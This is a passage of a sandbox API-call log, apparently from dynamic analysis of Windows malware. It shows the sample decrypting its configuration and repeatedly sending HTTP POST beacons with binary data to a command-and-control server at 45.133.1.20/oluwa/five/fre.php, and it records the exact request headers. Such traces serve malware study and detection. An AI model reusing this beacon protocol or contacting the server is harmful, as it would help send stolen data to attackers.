0x6a0000 [0220.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0220.085] GetProcessHeap () returned 0x6a0000 [0220.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0220.085] closesocket (s=0x658) returned 0 [0220.292] GetProcessHeap () returned 0x6a0000 [0220.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0220.292] GetProcessHeap () returned 0x6a0000 [0220.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0220.293] GetProcessHeap () returned 0x6a0000 [0220.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0220.295] GetProcessHeap () returned 0x6a0000 [0220.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0220.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x428) returned 0x658 [0220.306] Sleep (dwMilliseconds=0xea60) [0220.310] GetProcessHeap () returned 0x6a0000 [0220.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0220.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.311] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0220.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.331] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0220.340] GetProcessHeap () returned 0x6a0000 [0220.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0220.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.341] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0220.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.342] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0220.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.343] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.343] GetProcessHeap () returned 0x6a0000 [0220.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0220.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.397] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0220.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.398] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0220.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.549] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0220.549] GetProcessHeap () returned 0x6a0000 [0220.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0220.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.550] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0220.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.551] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0220.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.552] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0220.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.553] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0220.553] GetProcessHeap () returned 0x6a0000 [0220.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0220.553] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0220.554] GetProcessHeap () returned 0x6a0000 [0220.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0220.554] GetProcessHeap () returned 0x6a0000 [0220.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0220.555] GetProcessHeap () returned 0x6a0000 [0220.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0220.555] GetProcessHeap () returned 0x6a0000 [0220.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0220.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.556] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0220.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.568] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0220.579] GetProcessHeap () returned 0x6a0000 [0220.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0220.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.580] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0220.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.583] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0220.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.597] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.597] GetProcessHeap () returned 0x6a0000 [0220.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0220.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.598] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0220.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.599] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0220.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.600] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0220.600] GetProcessHeap () returned 0x6a0000 [0220.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0220.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.601] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0220.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.604] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0220.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.605] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0220.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.606] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0220.606] GetProcessHeap () returned 0x6a0000 [0220.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0220.606] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0220.606] GetProcessHeap () returned 0x6a0000 [0220.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0220.606] socket (af=2, type=1, protocol=6) returned 0x65c [0220.607] connect (s=0x65c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0220.633] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0220.633] GetProcessHeap () returned 0x6a0000 [0220.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0220.633] GetProcessHeap () returned 0x6a0000 [0220.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0220.634] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0220.635] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0220.635] GetProcessHeap () returned 0x6a0000 [0220.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0220.635] GetProcessHeap () returned 0x6a0000 [0220.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0220.636] GetProcessHeap () returned 0x6a0000 [0220.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0220.637] GetProcessHeap () returned 0x6a0000 [0220.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0220.637] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0220.638] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0220.638] GetProcessHeap () returned 0x6a0000 [0220.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0220.638] GetProcessHeap () returned 0x6a0000 [0220.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0220.639] send (s=0x65c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0220.639] send (s=0x65c, buf=0x6bb998*, len=159, flags=0) returned 159 [0220.639] GetProcessHeap () returned 0x6a0000 [0220.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0220.639] recv (in: s=0x65c, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0220.726] GetProcessHeap () returned 0x6a0000 [0220.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0220.727] GetProcessHeap () returned 0x6a0000 [0220.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0220.728] GetProcessHeap () returned 0x6a0000 [0220.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0220.728] GetProcessHeap () returned 0x6a0000 [0220.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0220.729] closesocket (s=0x65c) returned 0 [0220.729] GetProcessHeap () returned 0x6a0000 [0220.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0220.729] GetProcessHeap () returned 0x6a0000 [0220.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0220.730] GetProcessHeap () returned 0x6a0000 [0220.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0220.731] GetProcessHeap () returned 0x6a0000 [0220.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0220.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2fc) returned 0x65c [0220.733] Sleep (dwMilliseconds=0xea60) [0220.738] GetProcessHeap () returned 0x6a0000 [0220.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0220.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.739] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0220.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.751] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0220.764] GetProcessHeap () returned 0x6a0000 [0220.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0220.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.766] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0220.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.767] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0220.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.771] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.771] GetProcessHeap () returned 0x6a0000 [0220.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0220.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.773] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0220.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.782] CryptDestroyKey (hKey=0x6ad520) returned 1 [0220.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.784] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0220.784] GetProcessHeap () returned 0x6a0000 [0220.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0220.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.785] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0220.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.786] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0220.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.788] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0220.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.793] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0220.793] GetProcessHeap () returned 0x6a0000 [0220.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0220.793] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0220.793] GetProcessHeap () returned 0x6a0000 [0220.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0220.794] GetProcessHeap () returned 0x6a0000 [0220.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0220.794] GetProcessHeap () returned 0x6a0000 [0220.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0220.795] GetProcessHeap () returned 0x6a0000 [0220.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0220.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.796] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0220.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.804] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0220.814] GetProcessHeap () returned 0x6a0000 [0220.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0220.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.816] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0220.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.817] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0220.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.818] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.818] GetProcessHeap () returned 0x6a0000 [0220.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0220.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.819] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0220.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.821] CryptDestroyKey (hKey=0x6ad020) returned 1 [0220.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.822] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0220.822] GetProcessHeap () returned 0x6a0000 [0220.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0220.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.823] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0220.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.825] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0220.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.826] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0220.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.827] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0220.827] GetProcessHeap () returned 0x6a0000 [0220.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0220.827] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0220.827] GetProcessHeap () returned 0x6a0000 [0220.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0220.827] socket (af=2, type=1, protocol=6) returned 0x660 [0220.828] connect (s=0x660, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0220.849] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0220.849] GetProcessHeap () returned 0x6a0000 [0220.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0220.849] GetProcessHeap () returned 0x6a0000 [0220.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0220.850] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0220.851] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0220.851] GetProcessHeap () returned 0x6a0000 [0220.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0220.851] GetProcessHeap () returned 0x6a0000 [0220.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0220.852] GetProcessHeap () returned 0x6a0000 [0220.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0220.852] GetProcessHeap () returned 0x6a0000 [0220.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0220.853] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0220.854] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0220.854] GetProcessHeap () returned 0x6a0000 [0220.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0220.854] GetProcessHeap () returned 0x6a0000 [0220.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0220.855] send (s=0x660, buf=0x6b5c98*, len=242, flags=0) returned 242 [0220.855] send (s=0x660, buf=0x6bb998*, len=159, flags=0) returned 159 [0220.855] GetProcessHeap () returned 0x6a0000 [0220.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0220.855] recv (in: s=0x660, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0220.942] GetProcessHeap () returned 0x6a0000 [0220.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0220.944] GetProcessHeap () returned 0x6a0000 [0220.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0220.944] GetProcessHeap () returned 0x6a0000 [0220.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0220.945] GetProcessHeap () returned 0x6a0000 [0220.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0220.945] closesocket (s=0x660) returned 0 [0220.946] GetProcessHeap () returned 0x6a0000 [0220.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0220.946] GetProcessHeap () returned 0x6a0000 [0220.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0220.946] GetProcessHeap () returned 0x6a0000 [0220.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0220.947] GetProcessHeap () returned 0x6a0000 [0220.947] HeapFree (in: 